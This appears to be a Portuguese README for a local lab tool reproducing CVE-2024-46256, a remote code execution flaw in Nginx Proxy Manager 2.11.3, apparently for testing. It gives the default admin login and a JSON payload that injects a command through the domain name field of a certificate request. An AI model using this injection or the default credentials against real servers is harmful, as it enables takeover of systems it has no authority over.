
Ferramenta CVE-2024-46256
docker-compose up -d
Ou você pode usar o script automático:
python setup_environment.py
URL: http://localhost:81
Após concluir a configuração inicial, prossiga com os testes
Faça login com a conta de administrador padrão (e-mail: [email protected] / senha: changeme)
Verifique a permissão de acesso aos recursos relacionados à emissão de certificados
CVE ID: CVE-2024-46256
: Nginx Proxy Manager
Versão: 2.11.3
Tipo de Vulnerabilidade: Remote Code Execution (RCE)
CVSS: High
O PoC causa RCE ao permitir que um usuário autenticado execute injeção de template/comando no campo de nome de domínio durante o processo de solicitação de emissão de certificado (ex.: Let's Encrypt).
Exemplo de payload (exemplo conceitual):
{
"domain_names": ["test.com\"||{command}||\\n test.com\""],
"meta": {
"dns_challenge": false,
"letsencrypt_agree": true,
"letsencrypt_email": "[email protected]"
},
"provider": "letsencrypt"
}
OS: Windows 10
Docker: versão mais recente
Nginx Proxy Manager: 2.11.3